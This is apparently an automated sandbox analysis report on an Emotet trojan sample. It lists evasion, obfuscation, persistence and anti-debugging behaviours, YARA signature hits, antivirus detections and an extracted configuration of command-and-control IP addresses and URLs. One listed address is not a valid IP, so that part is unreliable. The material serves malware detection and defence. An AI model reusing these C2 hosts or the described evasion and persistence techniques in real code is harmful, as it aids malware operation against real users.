Source: C:\Windows\SysWOW64\leelsensor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: unknownProcess created: C:\Users\user\Desktop\n5hhkdky_exe.exe 'C:\Users\user\Desktop\n5hhkdky_exe.exe'
Source: unknownProcess created: C:\Users\user\Desktop\n5hhkdky_exe.exe --3abca77f
Source: unknownProcess created: C:\Windows\SysWOW64\leelsensor.exe C:\Windows\SysWOW64\leelsensor.exe
Source: unknownProcess created: C:\Windows\SysWOW64\leelsensor.exe --4e6ad84c
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeProcess created: C:\Users\user\Desktop\n5hhkdky_exe.exe --3abca77fJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess created: C:\Windows\SysWOW64\leelsensor.exe --4e6ad84cJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
PE file contains a mix of resources often seen in goodwareShow sources
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_CURSOR
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_BITMAP
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_ICON
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_MENU
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_DIALOG
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_STRING
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_ACCELERATOR
Source: n5hhkdky_exe.exeStatic PE information: section name: RT_GROUP_ICON

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00402D80 LoadLibraryW,GetProcAddress,_malloc,_memset,1_2_00402D80
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00453265 push ecx; ret 1_2_00453278
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004534E4 push ecx; ret 1_2_004534F7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00453265 push ecx; ret 4_2_00453278
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004534E4 push ecx; ret 4_2_004534F7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FAF1 push edx; retf 4_2_0229FAF8
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FAD3 push edx; iretd 4_2_0229FAD4
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FB0F push edx; retf 4_2_0229FB10
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FB1A push edx; retf 4_2_0229FB48
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FB77 push edx; iretd 4_2_0229FB84
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FD71 push edx; retf 4_2_0229FD80
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229FD52 push edx; iretd 4_2_0229FD70
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FAF1 push edx; retf 5_2_00F6FAF8
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FAD3 push edx; iretd 5_2_00F6FAD4
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FB77 push edx; iretd 5_2_00F6FB84
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FD71 push edx; retf 5_2_00F6FD80
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FD52 push edx; iretd 5_2_00F6FD70
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FB1A push edx; retf 5_2_00F6FB48
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F6FB0F push edx; retf 5_2_00F6FB10
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FAF1 push edx; retf 8_2_00F7FAF8
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FAD3 push edx; iretd 8_2_00F7FAD4
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FB77 push edx; iretd 8_2_00F7FB84
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FD71 push edx; retf 8_2_00F7FD80
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FD52 push edx; iretd 8_2_00F7FD70
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FB1A push edx; retf 8_2_00F7FB48
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F7FB0F push edx; retf 8_2_00F7FB10

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\leelsensor.exeExecutable created and started: C:\Windows\SysWOW64\leelsensor.exeJump to behavior
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exePE file moved: C:\Windows\SysWOW64\leelsensor.exeJump to behavior

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022BE138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_022BE138

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeFile opened: C:\Windows\SysWOW64\leelsensor.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0043E83B __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_0043E83B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0040EF3B IsIconic,GetWindowPlacement,GetWindowRect,1_2_0040EF3B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0040D69B IsWindowVisible,IsIconic,1_2_0040D69B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0043E83B __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,4_2_0043E83B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0040EF3B IsIconic,GetWindowPlacement,GetWindowRect,4_2_0040EF3B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0040D69B IsWindowVisible,IsIconic,4_2_0040D69B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0042DE6A GetParent,GetParent,IsIconic,GetParent,4_2_0042DE6A
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\leelsensor.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-57469
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_022BDE9C
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,8_2_00F9DE9C
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-47858
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeAPI coverage: 3.4 %
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeAPI coverage: 5.2 %
Source: C:\Windows\SysWOW64\leelsensor.exeAPI coverage: 9.2 %
Checks the free space of harddrivesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,1_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00448F3F lstrlenA,FindFirstFileA,FindClose,1_2_00448F3F
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,4_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00448F3F lstrlenA,FindFirstFileA,FindClose,4_2_00448F3F
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00454FA3 VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,1_2_00454FA3
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Program exit pointsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeAPI call chain: ExitProcess graph end nodegraph_1-48051
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeAPI call chain: ExitProcess graph end nodegraph_4-57244
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeAPI call chain: ExitProcess graph end nodegraph_4-57386
Source: C:\Windows\SysWOW64\leelsensor.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\leelsensor.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\leelsensor.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\leelsensor.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004516AC
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00454FA3 VirtualProtect ?,-00000001,00000104,?1_2_00454FA3
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00402D80 LoadLibraryW,GetProcAddress,_malloc,_memset,1_2_00402D80
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00402060 mov eax, dword ptr fs:[00000030h]1_2_00402060
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00402060 mov eax, dword ptr fs:[00000030h]4_2_00402060
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_02290467 mov eax, dword ptr fs:[00000030h]4_2_02290467
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_02290C0C mov eax, dword ptr fs:[00000030h]4_2_02290C0C
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_02291743 mov eax, dword ptr fs:[00000030h]4_2_02291743
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B12CD mov eax, dword ptr fs:[00000030h]4_2_022B12CD
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1E04 mov eax, dword ptr fs:[00000030h]4_2_022B1E04
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F60467 mov eax, dword ptr fs:[00000030h]5_2_00F60467
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F60C0C mov eax, dword ptr fs:[00000030h]5_2_00F60C0C
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F61743 mov eax, dword ptr fs:[00000030h]5_2_00F61743
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F812CD mov eax, dword ptr fs:[00000030h]5_2_00F812CD
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F81E04 mov eax, dword ptr fs:[00000030h]5_2_00F81E04
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F70467 mov eax, dword ptr fs:[00000030h]8_2_00F70467
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F70C0C mov eax, dword ptr fs:[00000030h]8_2_00F70C0C
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F71743 mov eax, dword ptr fs:[00000030h]8_2_00F71743
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F912CD mov eax, dword ptr fs:[00000030h]8_2_00F912CD
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91E04 mov eax, dword ptr fs:[00000030h]8_2_00F91E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B14F2 GetProcessHeap,RtlAllocateHeap,4_2_022B14F2
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0045CF3A SetUnhandledExceptionFilter,1_2_0045CF3A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004516AC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0045CF3A SetUnhandledExceptionFilter,4_2_0045CF3A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004516AC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0045DE2E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0045DE2E
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00457FA7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00457FA7

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,1_2_00422057
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,4_2_00422057
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: GetLocaleInfoA,4_2_0045FEEF
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0229E1F7 cpuid 4_2_0229E1F7
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\leelsensor.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0045D811 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0045D811
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0045E9DE __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,1_2_0045E9DE
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00416CBB __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,_DebugHeapAllocator,CoInitializeEx,CoCreateInstance,1_2_00416CBB
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0043A7E0 __cftof,CreateFileMoniker,CreateBindCtx,lstrlenA,CreateGenericComposite,1_2_0043A7E0
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00418B2A CreateBindCtx,_wcslen,CoTaskMemFree,1_2_00418B2A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00419590 __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,1_2_00419590
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0043A7E0 __cftof,CreateFileMoniker,CreateBindCtx,lstrlenA,CreateGenericComposite,4_2_0043A7E0
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00418B2A CreateBindCtx,_wcslen,CoTaskMemFree,4_2_00418B2A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00419590 __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,4_2_00419590

Malware Configuration

Threatname: Emotet

{"C2 list": ["59.103.164.174/zeZ30sx6u6cxuuD", "59.110.18.236:443", "206.81.10.215:8080", "107.2.2.28/FpU6cre", "107.2.2.28/537", "486.75.241.230/8HPGE9Y", "486.75.241.230/8HPGE9bD", "190.12.119.180:443", "45.56.88.91:443", "47.50.251.130/HLHvQpxstemprof", "47.50.251.130/HLHvQpx", "186.75.241.230/8HPGE9", "186.75.241.230/8HPGE9bD", "51.68.220.244/THUbD", "51.68.220.244:8080", "88.91.88.91:443"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
n5hhkdky_exe.exe79%VirustotalBrowse
n5hhkdky_exe.exe62%MetadefenderBrowse
n5hhkdky_exe.exe81%ReversingLabsWin32.Trojan.Emotet
n5hhkdky_exe.exe100%AviraTR/AD.Emotet.ebaw

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.0.n5hhkdky_exe.exe.400000.0.unpack100%AviraTR/AD.Emotet.ebawDownload File
1.0.n5hhkdky_exe.exe.400000.0.unpack100%AviraTR/AD.Emotet.ebawDownload File
8.0.leelsensor.exe.400000.0.unpack100%AviraTR/AD.Emotet.ebawDownload File
5.0.leelsensor.exe.400000.0.unpack100%AviraTR/AD.Emotet.ebawDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsU0%Avira URL Cloudsafe
http://59.110.18.236:443/kwTaaZ8qRHU20%Avira URL Cloudsafe
http://51.68.220.244/THUbD0%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH00%Avira URL Cloudsafe
http://206.81.10.215:8080/bAvwkbqP0%Avira URL Cloudsafe
http://47.50.251.130/HLHvQpx/0%Avira URL Cloudsafe
http://51.68.220.244:8080/THUbD0%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRHONVf0%Avira URL Cloudsafe
http://186.75.241.230/8HPGE9bD0%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH0%Avira URL Cloudsafe
http://47.50.251.130/HLHvQpx0%Avira URL Cloudsafe
http://186.75.241.230/8HPGE90%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH=0%Avira URL Cloudsafe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUa0%Avira URL Cloudsafe
http://107.2.2.28/FpU6cre0%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRHM0%Avira URL Cloudsafe
http://206.81.10.215:8080/bAvwkbqp0%Avira URL Cloudsafe
http://190.12.119.180:443/tovm2Xky7BQG8IM0%Avira URL Cloudsafe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUu0%Avira URL Cloudsafe
http://206.81.10.215:8080/bAvwkbq0%Avira URL Cloudsafe
http://47.50.251.130/HLHvQpxstemprofile0%Avira URL Cloudsafe
http://206.81.10.215:8080/bAvwkbq80%Avira URL Cloudsafe
http://206.81.10.215:8080/bAvwkbq60%Avira URL Cloudsafe
http://59.103.164.174/zeZ30sx6u6cxuuDrRRH)0%Avira URL Cloudsafe
https://45.56.88.91:443/dIcDsclHnHkYC8AHTsU0%Avira URL Cloudsafe
http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUy0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 26 02 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 0C 3C 26 02 A3 08 3C 26 02 39 05 60 03 26 02 74 18 40 A3 08 3C 26 02 83 3C C5 60 03 ...
00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
    00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
      • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
      00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
        • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
        • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
        00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
          • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F9 00 85 C0
          • 0x5066:$snippet6: 33 C0 21 05 0C 3C F9 00 A3 08 3C F9 00 39 05 60 03 F9 00 74 18 40 A3 08 3C F9 00 83 3C C5 60 03 ...
          00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
          • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 2C 02 85 C0
          • 0x5066:$snippet6: 33 C0 21 05 0C 3C 2C 02 A3 08 3C 2C 02 39 05 60 03 2C 02 74 18 40 A3 08 3C 2C 02 83 3C C5 60 03 ...
          00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
            • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B FA 00 85 C0
            • 0x5066:$snippet6: 33 C0 21 05 0C 3C FA 00 A3 08 3C FA 00 39 05 60 03 FA 00 74 18 40 A3 08 3C FA 00 83 3C C5 60 03 ...
            00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
              • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
              • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

              Unpacked PEs

              No yara matches

              Sigma Overview

              No Sigma rule has matched

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.